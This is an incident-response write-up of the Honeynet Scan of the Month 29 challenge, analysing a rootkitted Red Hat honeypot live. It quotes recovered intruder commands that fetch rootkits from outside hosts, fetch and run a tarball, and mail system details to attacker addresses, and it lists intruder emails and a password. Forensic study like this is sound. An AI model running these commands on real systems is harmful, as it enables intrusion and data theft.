SotM Scan29

                                                            Writeup by Dophine V. Britanico

dophine@digitelone.com

 

 

ACKNOWLEDGMENT

      To GOD for without his guidance you're not reading this man.

        To the Computer Security Community and Honeynet Project.

        To all who submit entries here past and future. Keep on submitting.

        To my daughters who inspire me.

 

CONTENTS

 

i     CHALLENGE SUMMARY

ii.     TECHNICAL ANALYSIS

iii.    LIVE ANALYSIS WEEKEND 1 -2

iv.    WEEKEND 3

v.    ANSWERS TO SOTM 29 QUESTIONS

vi.    ATTACKER SCRIPTS

vii    TRACES

viii   SNIFFER LOGS

ix.   LINKS AND RELATED TECHNICAL REFERENCES


 

i. CHALLENGE SUMMARY

 

On August 10, 2003 a Linux Red Hat 7.2 system was compromised. Your mission is to analyze the compromised system. What makes this challenge unique is you are to analyze a live system. The image in question was ran within VMware. Once compromised, we suspended the image. The challenge to you is to download the suspended image, run it within VMware (you will get a console to the system with root access), and respond to the incident. When responding to the incident, you may do a live analysis of the system or you can first verify that the system has been compromised and then take it down for a dead analysis (or a combination of both). In either case, you will be expected to explain the impact you had on the evidence. Fortunately, this system was prepared for an incident and MD5 hashes were calculated for all files before the system was deployed. Note, this image was recovered from VMware Workstation 4.0, it will not work in older versions. You can download an evaluation copy.

 

ii. TECHNICAL ANALYSIS

 


Download Attempt Failed:

 

My first and second attempt to download the suspended image of SOTM 29 challenge failed and took me almost a day figuring out why on earth, those attempts failed . Using my friend’s computer which is connected using broadband, (compared to my lowly dial-up connection which is not able to digest the stream as  fast as I want it), I was able download the file faster thereby reducing the economic cost and man hour on my part. But I've encountered an error and I don’t know if this   can be duplicated by others.  Using XP OEM (SP1), I’ve found out that using IE (with latest hot fixes) failed to properly reassemble (I don’t think this is the right technical term) the streams from the tar.bz2 MIME type. My remedy, manually adding the .bz2 extensions on windows but failed, to make it sure I download it twice to verify but still get the same error. As I've seen it the current connection's is O.K. it has packet filtering firewall, there's no trojans as far as I can evaluate,  and no malware either. My initial suspect was, it was part of the challenge  and the md5sum hashes was intentionally change by project honeynet to fool us, but twice I’ve downloaded the file completely but when I’ve check the md5sum it was different. To further confirmed that my connections is clean I downloaded a huge iso file and it all goes well, thus leaving the assumption that my connections has something to do with it.  Using bzip2recover utility I manually recovered part of the file. I even inquired project honeynet (Lance) and replied back that it was downloaded 1,500 times if I recall it right and with no error. So my conclusions is that my connections is ok, the other side is ok, therefore IE has to do with it. Correct me ppl if I’m mistaken: -). How I downloaded it? I  installed Linux on one of the computers and on my 1st attempt.  Presto! fast download, Linux identified the .bz2 MIME type extensions correctly and the md5sum is identical with the one on those of project honeynet.

[root@localhost root] md5sum linux-suspended.tar.bz

d95a8c351e048bd7d5596d6fc49b6d72 linux-suspended.tar.bz

The first thing a sane forensic analyst will certainly do when performing Live Incident response would be to duplicate the entire system and catalog it [10][11], second assessed how critical the damage and crucial the data  that’s resides inside the compromised system, whether it is advisable to enter in single user mode and or permanently disconnect the connections from external network for dead analysis and without affecting the performance of the entire system, or figure out whether implementing those actions will not trigger the system to self destruct if it is booby trap, or evaluate and re-consider the usage requirement of users if ever anybody is relying solely for precious connections from the compromised system and need not be disconnected. If one of the above criteria  fails and or in dependency with one of the above, then combination of both can be performed by the forensic analyst, and  a computer security expert. Live and dead analysis. The general rule is “the earlier the better” and where data is still fresh.

VMware [1h]  preserves the current states of the virtual machine by suspending , saving, and reverting and can satisfies one of the criteria of Incident Response, duplication of the entire virtual machine also  can be easily done by using simple copy or using dd, and netcat if ever this was a real system. On SOTM 29 here’s the step by step process I’ve done. 

 

(1) Before resuming the current state of  compromised virtual machines (VMX), beside the md5sum

     combination pair I backup first the entire VMX by copying it in another folder.

 

(2) Setup another VMX using Vanilla RH 8.0 with host only networking support and check if network

     traffic  can be seen by the Host O.S.

 

(3) Installed packet filtering firewall on the Host O.S. just in case something  nasty comes out from

     the rouge VMX.

 

(4) Manually edited the VMX configuration file ‘’linux.vmx” and changing the following lines, so that I

     can use it on windows.

ide0:0.fileName   = "/dev/cdrom"      to ide1:0.fileName   = "auto detect"

ide0:0.deviceType = "atapi-cdrom"     to ide1:0.deviceType = "cdrom-raw"

(5) Resumes the VMX and just after the login procedure  saved the current VMX so that reverting

     would be easier later.

 

(6) I perform some live neanderthal forensics acrobatics.

 


 

iii. LIVE ANALYSIS: WEEKEND 1 - 2

 

TOOLS: linux binaries including mount, md5sum, dd , dumpfs, the intruder binaries ls, ps, netstat,

           ifconfig, md5deep, and chkrootkit [1i].

 

My initial instinct after I’ve seen the running compromised system is that it has a network sniffer [12] running  by seeing the word “eth0: Promiscuous mode enabled.” a classic signature of a system NIC enabled in promiscuous mode [13], I’ve also notice an unusual  init process popping up just after authentication “(swapd)” which is probably a hidden process that listen to RAW socket (PF_INET, SOCK_PACKET) in which the kernel reported to be obsolete. On my system “INIT: “ is puking and it keeps reminding me that it is respawning too fast, another hint that something is bad and checking /etc/fstab reveals another interesting information . Remembering that this is not a real system I’m almost tempted to switch into single user mode and see how the system reacts but having thought that the startup scripts  has been compromised and might erase again some logs and make post mortem analysis harder and time consuming, I prefer to test some binaries that I know is the favorite of almost all of rootkits and took a peek of the system live without a clean binary.

  

First  I’ve test ls and nothing seems funny (but we assume  this ones is not the original), traversing different directory , creating invisible directories like “dot space “ and see how ls reacts,

 

[root@localhost root]cd /tmp; mkdir ". "

[root@localhost root]ls - al

total 12

drwxrwxrwt      3 root   root                  4096    Aug 10 22:18 .

drwxr-xr-x      2 root   root                  4096    Aug 10 22:18 .

drwxr-xr-x     18 root   root                  4096    Aug 10 15:54 ..

clever!, so the attacker assumes if we are looking for “dot dot space “ directory, an inexperience administrator may ignore it, and concludes that the ls binary is in good place. Again let’s try passing some arguments to ls like ls -al -1 and etc. Now when I pass...

[root@localhost root]ls - alh

ls:  invalid option -h

Try ‘ls -help’ for more information

That certainly trip it,  md5sum and md5deep  confirms that it was indeed replace.

 

Now checking /etc/fstab  to find out why INIT is complaining.

Wow!  in /etc/fstab  automounts /dev/shm  as tempfs which contains a script that notifies  the hacker thru email to newprtaceuser@yahoo.com when the honeypot is online sends the honeypot IP and it is SETUID SETGID a legitimate SysAd would not do this.

 

Let’s look for hidden files this time using find

[root@localhost root] find / -name “.*” -print xdev | more

/var/spool/at.SEQ

/etc/opt/pysbnc/tools/.chk

/etc/skel/.bash_logout

/etc/skel/.bash_profile

/etc/skel/.bashrc

/etc/.pwd.lock

/usr/lib/perl5/5.6.0/i386-linux/.packlist

/usr/share/doc/samba-2.2.1a/examples/VFS/.cvsignore

/usr/share/man/man1/..1.gz

/lib/.x

/lib/.x/.boot

/root/.bash_logout

/root/.Xresources

/root/.bash_profile

/root/.bashrc

/root/.cshrc

/root/.tcshrc

/root/.bash_history

/root/.ssh

/root/.links

/.autofsck

/.bash_history

Hmm!, what does ''.bash_history''  doing in the parent directory. There are only two possibilities here either systems started in single user mode or an after an exploit.

[root@localhost root]cd /; cat .bash_history

uptime

./inst

hostname

hostname sbm79.dtc.apu.edu

cd /dev/shm/sc

./install sbm79.dtc.apu.edu

rm -rf  /var/mail/root                        // Legitimate Admin wouldn't delete this

ps x

cd /tmp

ls -a

wget izolam.net/ssltop.tar.gz            // It's modifies httpd.conf 

ps x

ps aux | grep apache

kill -9 21510 21511 23829 23292 23302

The intruder also installed psybnc and poking into the configuration and logs I have found out another interesting hint.

 

On psybnc.conf

PSYBNC.SYSTEM.PORT1=65336

USER1.USER.LOGIN=sic

USER1.USER.USER=_4,1I`m siCk motherfucker siCk_

USER1.USER.PASS==`N`Y1y`T1201'l`C`g

.

..

USER1.SERVERS.SERVER1=mesa.az.us.undernet.org

USER1.SERVERS.PORT1=6667

USER1.CHANNELS.ENTRY1=#radioactiv

USER1.CHANNELS.ENTRY0=#RedCode

USER2.USER.LOGIN=redcode

USER2.USER.USER=_4,1redCode_8Chicken_

USER2.USER.PASS==`&'X1e'O`t1I1k'8'6

On psybnc.log.

Sun Aug 10 16:02:46 :psyBNC2.3.1-cBtITLdDMSNp started (PID :15119)

Sun Aug 10 16:03:32 :connect from sanido-09.is.pcnet.ro

Sun Aug 10 16:03:32 :New User:sic (wqewqde dedwqere) added by sic

.

..

Sun Aug 10 17:49:47 :User sic logged in.

Sun Aug 10 17:50:39 :New User:redcode (_4,1redCode_8Chicken_) added by sic

Sun Aug 10 17:50:51 :User redcode () has no server added

Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro

Sun Aug 10 17:51:22 :User redcode logged in.

Sun Aug 10 17:51:36 :User redcode () trying mesa.az.us.undernet.org port 6667 ().

Sun Aug 10 17:51:36 :User redcode () connected to mesa.az.us.undernet.org:6667 ()

Sun Aug 10 17:51:42 :User redcode () got disconnected (from mesa.az.us.undernet.org) Reason: Closing Link: killme by mesa.az.us.undernet.org (Sorry, your connection class is full - try again later or try another server)

Sun Aug 10 17:52:06 :User redcode () trying mesa.az.us.undernet.org port 6667 ().

Sun Aug 10 17:52:06 :User redcode () connected to mesa.az.us.undernet.org:6667 ()

Sun Aug 10 18:00:49 :User redcode quitted from sanido-08.is.pcnet.ro)

Changing directory to  /lib/.x  gave us another interesting (again) information

I’ve got some of the configuration scripts  of the ssh backdoor, and sniffer.

using strings we got this information on the following files.

cl (ELF)                         = Die Putze log cleaner [1d]

inst (SCRIPT)                    = sniffer which is copied to /sbin/init

log (ELF)                        =  SUCKIT LKM [1e] rootkit

sln (ELF) UPX [1f] packer        =

mfs                              = sniffer logs

r_s                              = SSH initial random seed value

s_h_k                            = intruder  SSH private key

s_h_k.pub                        = intruder SSH public key

sshd_config                      = SSHD config file

xopen = SSH

and Let’s get back with (swapd) before we are lost in haste.

[root@localhost root]cd /

[root@localhost /]find / -name "(swapd)"

Lo and behold !, (swapd) is not a standard linux binary as far as I’m concerned  and it was located in /usr/bin/(swapd), using strings further reveal more intruder activities. My initial assessment is that it was a sniffer by the strings output.

<cut>

 

cant get SOCK_PACKET socket

cant get flags

cant set promiscuous mode

..

eth0

/usr/lib/libice.log

can’t open log

rm %s

.

<snip..>

 

Another hint for us so looking  at /usr/lib/libice.log using vi

Proxyscan.undernet.org => 192.168.179 [23]

Hmm!, if we try to decipher this, it is a log connection from proxyscan.undernet.org to our honeypot on port 23.

  

Next , if the system a while ago reported that interface “eth0” is on promiscuous mode logic will told us that, ifconfig should report it too.

[root@localhost root]ifconfig

 

lo        Link encap:Local Loopback 

          inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:8328 errors:109 dropped:0 overruns:0

          TX packets:0 errors:0 dropped:0 overruns:8328

 

eth0      Link encap:10Mbps Ethernet  HWaddr 00:0C:29:89:42:93

          inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

          RX packets:6618588 errors:9788 dropped:0 overruns:0

          TX packets:0 errors:0 dropped:0 overruns:868319

          Interrupt:10 Base address:0x10e0

None, so this confirms again our md5sum hashed. Let’s see the logs.

[root@localhost root]cd /var/log; ls -al

Notice that files is link to /dev/null and some files are missing and using vi for secure.

Aug 10 16:04:14  telnet session from 193.109.122.5

And failed ssh connection from 202.85.165.46 on same date 18:58:33

Using vi for maillog  reveals even more interesting hint for us that corroborate logs we found in pysbnc. Intruder  sending system information to this email addresses.

jijeljijel@yahoo.com

newptraceuser@yahoo.com

skiZophrenia_siCk@yahoo.com

[root@localhost root]cd

[root@localhost root]ls -al .bash_history

w00w00! .bash_history is also simlink to /dev/null. Indeed System was compromised and trying ps this time.

 

        [root@localhost root] ps x       

 

  PID   TTY   STAT  TIME COMMAND

    1  ?      S    0:05 init

    2  ?      SW   0:00 [keventd]

    3  ?      SW   0:00 [kapm-idled]

    4  ?      SWN  0:00 [ksoftirqd_CPU0]

    6  ?      SW   0:00 [kreclaimd]

    7  ?      SW   0:00 [bdflush]

    8  ?      SW   0:00 [kupdated]

    9  ?      SW<  0:00 [mdrecoveryd]

   17  ?      SW   0:05 [kjournald]

   92  ?      DW   0:00 [khubd]

  657  ?      S    0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri

  699  ?      S    0:00 /usr/sbin/sshd

  732  ?      S    0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid

  759  ?      S    0:00 sendmail: accepting connections

  778  ?      S    0:00 gpm -t ps/2 -m /dev/mouse

  820  ?      S    0:00 crond

  893   1     S    0:00 login -- root     

  894   2     S    0:00 /sbin/mingetty tty2

  895   3     S    0:00 /sbin/mingetty tty3

  896   4     S    0:00 /sbin/mingetty tty4

  899   5     S    0:00 /sbin/mingetty tty5

  900   6     S    0:00 /sbin/mingetty tty6

  901   1     S    0:00 -bash

 3247  ?      S    0:00 syslogd -m 0

 3252  ?      S    0:00 klogd -2

15119  ?      S    0:00 initd

15440  ?      S    0:00 CROND

15443  ?      S    0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem root

15605   1     R    0:00 ps x

25239  ?      S    0:00 /lib/.x/s/xopen -q -p 3128

25241  ?      S    0:00 /lib/.x/s/xopen -q -p 3128

25247  ?      S    0:00 /lib/.x/s/lsn

 

Very unusual process running  15440, 25239, 25241, 25247 lets get back to it later.

Now trying netstat

 

[root@localhost root] netstat -an

 

Active Internet connections (including servers)

Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 192.168.1.79:65336      213.154.118.200:1188    ESTABLISHED

tcp        0      0 0.0.0.0:65436           0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN     

tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:3128            0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:65336           0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:2003            0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN     

udp        0      0 0.0.0.0:3049            0.0.0.0:*                          

Active UNIX domain sockets (including servers)

Proto RefCnt Flags       Type       State         I-Node Path

unix  2      [ ]         DGRAM                    804   

unix  2      [ ]         DGRAM                    924   

unix  2      [ ]         DGRAM                    990   

unix  2      [ ]         DGRAM                    1078  

unix  3      [ ]         DGRAM                    7993  

unix  2      [ ]         DGRAM                    15679 

unix  4      [ ]         DGRAM                    7984   /dev/log

unix  2      [ ACC ]     STREAM     LISTENING     943    /dev/gpmctl

Active IPX sockets

Proto Recv-Q Send-Q Local Address              Foreign Address            State

 

Very unusual port activated and one connection established, but we are not sure because we know that netstat is also replace like ifconfig and ps.

 

Let’s confirm now our initial assessment before all things gets dirty by using md5deep, md5sum and chkrootkit by mounting the CDROM Drive.

 

[root@localhost root]mount  /dev/cdrom /mnt; cd /mnt/ ; cp linux-suspended-md5s.gz md5deep-0.16.tar.gz chkrootkit-0.41.tar.gz  /tmp/; cd /tmp/; gzip –d linux-suspended-md5s.gz md5deep-0.16.tar.gz

 

[root@localhost tmp]md5sum -c linux-suspended-md5s | grep FAILED > failed; vi failed

 

/var/lib/slocate/slocate.db: FAILED

/var/lib/random-seed: FAILED

/var/lib/logrotate.status: FAILED

/var/log/messages: FAILED

/var/log/lastlog: FAILED open or read

/var/log/secure: FAILED

/var/log/maillog: FAILED

/var/log/wtmp: FAILED

/var/log/sa/sa14: FAILED open or read

/var/log/sa/sa15: FAILED open or read

/var/log/sa/sar14: FAILED open or read

/var/log/sa/sa16: FAILED open or read

/var/log/sa/sar15: FAILED open or read

/var/log/sa/sa06: FAILED open or read

/var/log/samba/log.smbd: FAILED open or read

/var/log/samba/smbd.log: FAILED open or read

/var/log/samba/log.nmbd: FAILED open or read

/var/log/samba/localhost.log: FAILED open or read

/var/log/xferlog: FAILED open or read

/var/log/httpd/error_log: FAILED open or read

/var/log/httpd/ssl_engine_log: FAILED open or read

/var/log/httpd/access_log: FAILED open or read

/var/log/httpd/ssl_request_log: FAILED open or read

/var/log/httpd/access_log.1: FAILED open or read

/var/log/httpd/error_log.1: FAILED open or read

/var/log/dmesg: FAILED

/var/log/cron: FAILED

/var/log/boot.log: FAILED

/var/log/rpmpkgs: FAILED open or read

/var/cache/man/whatis: FAILED

/var/cache/samba/smbd.pid: FAILED

/var/cache/samba/connections.tdb: FAILED

/var/cache/samba/nmbd.pid: FAILED

/var/run/utmp: FAILED

/var/run/runlevel.dir: FAILED

/var/run/syslogd.pid: FAILED

/var/run/klogd.pid: FAILED

/var/run/apmd.pid: FAILED

/var/run/sshd.pid: FAILED

/var/run/sendmail.pid: FAILED

/var/run/gpm.pid: FAILED

/var/run/crond.pid: FAILED

/var/run/ftp.pids-all: FAILED open or read

/var/run/ftp.rips-all: FAILED open or read

/var/spool/anacron/cron.daily: FAILED

/var/spool/anacron/cron.weekly: FAILED

/tmp/root.md5: FAILED open or read

/etc/mtab: FAILED

/etc/passwd: FAILED

/etc/rc.d/init.d/functions: FAILED

/etc/rc.d/rc.sysinit: FAILED

/etc/mail/statistics: FAILED

/etc/aliases.db: FAILED

/etc/adjtime: FAILED

/etc/samba/secrets.tdb: FAILED

/etc/httpd/conf/httpd.conf: FAILED

/etc/shadow: FAILED

/usr/bin/top: FAILED

/bin/netstat: FAILED

/bin/ls: FAILED

/bin/ps: FAILED

/sbin/ifconfig: FAILED

and using chkrootkit [1K] detects LKM rootkits.

[root@localhost tmp]./chkrootkit

 

ROOTDIR is ‘/’

<cut>

.

..

Checking  ‘ifconfig’ ... INFECTED

Checking  ‘ls’ ... INFECTED

Checking  ‘netstat’ ... INFECTED

Checking  ‘ps’ ... INFECTED

Checking  ‘top’ ... INFECTED

 .

<snip>

..

Searching for sniffer’s logs, it may take a while ,,, nothing found :-(

.

..

Searching for suspicious files and dirs, it may take a while...

/usr/lib/perl5/5.6.0/i386-linux/.packlist /lib/.x/ /lib/.x/.boot

.

..

Searching  for anomalies in shell history files...Warning: ‘//root/.bash_history’ is linked to another file  (‘’ln -s /dev/null /root/bash_history’’)

 

Checking ‘bindshell’... INFECTED (PORTS : 3049)

Checking ‘lkm’... You have      3 process hidden for ps command

Warning Possible LKM Trojan installed

Checking ‘sniffer’...

eth0 is PROMISC

 

chkrootkit confirms also previous assessment.

 


iv. WEEKEND 3

 

Restoring again from my backup using find, I was able also to locate some of the original binaries located in /usr/lib/libshtift/ directory.

 

[root@localhost root]/usr/lib/libshtift/ps -xuw

 

USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND

root         1  0.0  0.5  1424  528 ?        S    Aug09   0:05 init

root         2  0.0  0.0     0    0 ?        SW   Aug09   0:00 [keventd]

root         3  0.0  0.0     0    0 ?        SW   Aug09   0:00 [kapm-idled]

root         4  0.0  0.0     0    0 ?        SWN  Aug09   0:00 [ksoftirqd_CPU0]

root         5  0.0  0.0     0    0 ?        SW   Aug09   0:00 [kswapd]

root         6  0.0  0.0     0    0 ?        SW   Aug09   0:00 [kreclaimd]

root         7  0.0  0.0     0    0 ?        SW   Aug09   0:00 [bdflush]

root         8  0.0  0.0     0    0 ?        SW   Aug09   0:00 [kupdated]

root         9  0.0  0.0     0    0 ?        SW<  Aug09   0:00 [mdrecoveryd]

root        17  0.0  0.0     0    0 ?        SW   Aug09   0:06 [kjournald]

root        92  0.0  0.0     0    0 ?        DW   Aug09   0:00 [khubd]

root       657  0.0  0.5  1396  524 ?        S    Aug09   0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scripts/apmscript

root       699  0.0  1.3  2676 1272 ?        S    Aug09   0:00 /usr/sbin/sshd

root       732  0.0  1.0  2264  956 ?        S    Aug09   0:00 xinetd -stayalive -reuse -pidfile /var/run/xinetd.pid

root       759  0.0  2.1  5296 1984 ?        S    Aug09   0:00 sendmail: accepting connections

root       778  0.0  0.5  1440  496 ?        S    Aug09   0:00 gpm -t ps/2 -m /dev/mouse

root       820  0.0  0.6  1584  660 ?        S    Aug09   0:00 crond

root       893  0.0  1.1  2320 1076 tty1     S    Aug09   0:00 login -- root    

root       894  0.0  0.4  1384  448 tty2     S    Aug09   0:00 /sbin/mingetty tty2

root       895  0.0  0.4  1384  448 tty3     S    Aug09   0:00 /sbin/mingetty tty3

root       896  0.0  0.4  1384  448 tty4     S    Aug09   0:00 /sbin/mingetty tty4

root       899  0.0  0.4  1384  448 tty5     S    Aug09   0:00 /sbin/mingetty tty5

root       900  0.0  0.4  1384  448 tty6     S    Aug09   0:00 /sbin/mingetty tty6

root       901  0.0  1.3  2452 1296 tty1     S    Aug09   0:00 -bash

root      3137  0.0  0.7  1900  716 ?        S    13:33   0:03 smbd -D

root      3153  0.0  0.7  1664  704 ?        S    13:33   0:00 (swapd)

root      3247  0.0  0.6  1472  592 ?        S    13:33   0:00 syslogd -m 0

root      3252  0.0  1.1  1984 1096 ?        S    13:33   0:00 klogd -2

root     25239  0.0  0.3  1880  336 ?        S    15:32   0:00 /lib/.x/s/xopen -q -p 3128

root     25241  0.0  0.7  1888  672 ?        S    15:32   0:00 /lib/.x/s/xopen -q -p 3128

root     25247  0.0  0.7  1668  732 ?        S    15:32   0:00 /lib/.x/s/lsn

root     15119  0.0  1.3  2296 1240 ?        S    16:02   0:00 initd

root     15607  0.0  0.7  2636  728 tty1     R    20:34   0:00 /usr/lib/libshtift/ps -xuw

   

[root@localhost root]/usr/lib/libshtift/netstat -an

 

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:2003            0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:65336           0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:3128            0.0.0.0:*               LISTEN     

tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN     

tcp        0      0 0.0.0.0:65436           0.0.0.0:*               LISTEN     

tcp        0      0 192.168.1.79:65336      213.154.118.200:1188    ESTABLISHED

tcp        0     34 192.168.1.79:1149       64.62.96.42:6667        FIN_WAIT1  

tcp        0      9 192.168.1.79:1146       199.184.165.133:6667    ESTABLISHED

udp        0    288 192.168.1.79:1030       192.168.1.1:53          ESTABLISHED

udp        0      0 0.0.0.0:3049            0.0.0.0:*                           

Active UNIX domain sockets (servers and established)

Proto RefCnt Flags       Type       State         I-Node Path

unix  2      [ ACC ]     STREAM     LISTENING     943    /dev/gpmctl

unix  4      [ ]         DGRAM                    7984   /dev/log

unix  2      [ ]         DGRAM                    15679 

unix  2      [ ]         DGRAM                    7993  

unix  2      [ ]         DGRAM                    1078  

unix  2      [ ]         DGRAM                    990   

unix  2      [ ]         DGRAM                    924   

unix  2      [ ]         DGRAM                    804   

Active IPX sockets

Proto Recv-Q Send-Q Local Address              Foreign Address            State

 

[root@localhost root]/usr/lib/libshtift/ifconfig

 

eth0      Link encap:Ethernet  HWaddr 00:0C:29:89:42:93 

          inet addr:192.168.1.79  Bcast:192.168.1.255  Mask:255.255.255.0

          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1

          RX packets:9788 errors:0 dropped:0 overruns:0 frame:0

          TX packets:9100 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0

          RX bytes:6618588 (6.3 Mb)  TX bytes:868823 (848.4 Kb)

 

lo        Link encap:Local Loopback 

          inet addr:127.0.0.1  Mask:255.0.0.0

          UP LOOPBACK RUNNING  MTU:16436  Metric:1

          RX packets:113 errors:0 dropped:0 overruns:0 frame:0

          TX packets:113 errors:0 dropped:0 overruns:0 carrier:0

          collisions:0

          RX bytes:8684 (8.4 Kb)  TX bytes:8684 (8.4 Kb)

 

Next using grep and sleuthkit[15], and  was able to locate  more information.

As I’ve often observed,  Blackhats usually after gaining super user status remotely they will and always find a way to retrieve their 0day rootkits, and etc somewhere either utilizing FTP, or WGET or by other means like DCC, NETCAT, LYNX and etc. to patch their newly owned box. So using this common hacking methods I was able to retrieve from the VMX disk the following information’s.

wget izolam.net/rc/inst -q

wget izolam.net/adore

wget izolam.net/rc/ssh/sp0

wget izolam.net/gods

wget izolam.net/ssltop.tar.gz

wget www.psychoid.lam3rz.de/psybnc

 

wget geocities.com/mybabywhy/rk.tar.gz

wget geocities.com/gavish19/abc.tgz

wget lugojteam.as.ro/rootkit.tar

wget www.i-need-ftp.as.ro/ttt.gz

wget irine11979.go.ro/mass2.tgz

wget irine11979.netfirms.com/er.tgz

wget irine11979.go.ro/a.tgz

 

wget takiweb.com/~xlogic/xl.tgz; tar zxvf xl.tgz;cd xl; ./statz

 

lynx -source 209.249.147.160/~deal/qd 1> qd 2>/dev/null

And after following all the links, duplicating the commands uncompressed the tar balls and utilizing goooooooooogle I was able to acquire the some of the files and the rootkit. files compared using md5sum with the live systems strongly confirm their similarities.

 

greping /proc/kcore ‘core’ files also reveals similar information's from previous assessments.

 

I discovered also part of the sniffer logs IMHO (forgive me if this is incomplete) , and found intruders fingerprints like /sbin/ifconfig -a | mail -s "'/sbin/ifconfig | grep inet | awk '{print $2' | cut -d: -f2'" -c ghost@altavista.com em1nemk1t@yahoo.com . Another relevant informations also like  intruders user and password ‘’pwd: hack3r user: hack3r’’ combination installing rootkit and unstar it.

 

That’s all folks!!! :- ((

 


 

v. ANSWERS TO SOTM 29  QUESTIONS

 

Questions

  1. Describe the process you used to confirm that the live host was compromised while reducing the impact to the running system and minimizing your trust in the system.

 

A) After resuming the VMX I already know that the machine is compromised by the NIC output where and it was enabled promiscuous mode.

 

B) By mounting my computer CD-ROM drive with tools like, md5sum, md5deep, chkrootkit and sleuthkit I was able to confirm the honeynet was compromised by comparing the original md5sum hash from project honeynet to the live host, and using chkrootkit.

 

C) Using the linux binaries like ls and testing how it reacts when I pass parameters that I know that is valid where the trojaned binaries fails, I also used the find command looking for occurrences of suspicious files and directories on the honeypot and also using strings/grep.

 

D) Finally I was able to confirm that the intruder utilized LKM rootkit such as suckit[1e] and adore[14] by doing strings command for each of the suspected files detected by chkrootkit and files I found manually from the compromised system and utilizing google .

 

Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2 .

  1. Explain the impact that your actions had on the running system.

 

Since the CD-ROM drive are mounted RO by default, there is no critical effect on files located on the CD-ROM since it can’t be altered and no impact on the running system either.  Testing the compromised host  without any clean binary at hand  I was able to perform post mortem live analysis flawlessly because the altered or modified binaries does not have any self-destructive mechanism that may affect the running system. Running in single user mode or taking down the system for dead analysis prolong the job and miss some properties available only on the suspended state. IMPACT to system NONE, to me AHHHH! just lots of wasted electricity, and coffee. :- )

 

Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2.

  1. List the PID(s) of the process(es) that had a suspect port(s) open (i.e. non Red Hat 7.2 default ports).

 

PID 25239 lib/.x/s/xopen -q -p PORT 3128

PID 25241 /lib/.x/s/xopen -q -p PORT 3128

  1. Were there any active network connections? If so, what address(es) was the other end and what service(s) was it for?

 

Yes there were active connections on the compromised system.

      The address are from the honeypot 192.168.1.79 to

 

213.154.118.200          HP WEB ADMIN

64.62.96.42              IRC

199.184.165.133          IRC

192.168.1.1:53           DNS probably VMWARE

                  Further details above sub-titled WEEKEND 3

  1. How many instances of an SSH server were installed and at what times?

 

    I think there were 4  instances of SSH installed,

 

          1 /usr/sbin/sshd              time 0:00 AM        PID 699

          2 /lib/.x/s/xopen             time 3:52 PM        PID 25239

          3 /lib/.x/s/xopen             time 3:52 PM        PID 25247

          4 /usr/bin/"smbd -D"          time 3:33 PM        PID 3137

     

                Further details above sub-titled WEEKEND 3

  1. Which instances of the SSH servers from question 5 were run?

 

ssh  disguise as xopen with PID’s 25239 and 25247 which listens on non standard ssh port 3128. And /usr/bin/"smbd -D"  PID 31337

 

                Further details above sub-titled WEEKEND 3

  1. Did any of the SSH servers identified in question 5 appear to have been modified to collect unique information? If so, was any information collected?

 

Yes one of the SSH servers  were modified  it was /usr/bin/"smbd -D"  with PID 3137 which I believe was part adore rootkit fake sshd.

 

Yes information was collected by  /usr/bin/"smbd -D" and the logs were save in /usr/lib/libice.log (I believed this are part of logs, recovered using sleuthkit)

  1. Which system executables (if any) were trojaned and what configuration files did they use?

 

Using chkrootkit I was able to determined executables trojaned:

like pico, ps, ifconfig, ls, netstat, top, /usr/bin/crontabs, /dev/shm/k . And using the data I gathered  using standard linux binaries and sleuthkit this are the configurations files I've found that are use

 

/etc/rc.d/init.d/functions which invoke sniffer /usr/bin/crontabs

/etc/httpd/conf/httpd.conf

    

            Further details above sub-titled LIVE ANALYSIS: WEEKEND 1-2. and

         detailed scripts installation process below sub-titled SCRIPTS.

  1. How and from where was the system likely compromised?

 

    Sorry lack of time, google will do.

Bonus Question:
What nationality do you believe the attacker(s) to be, and why?

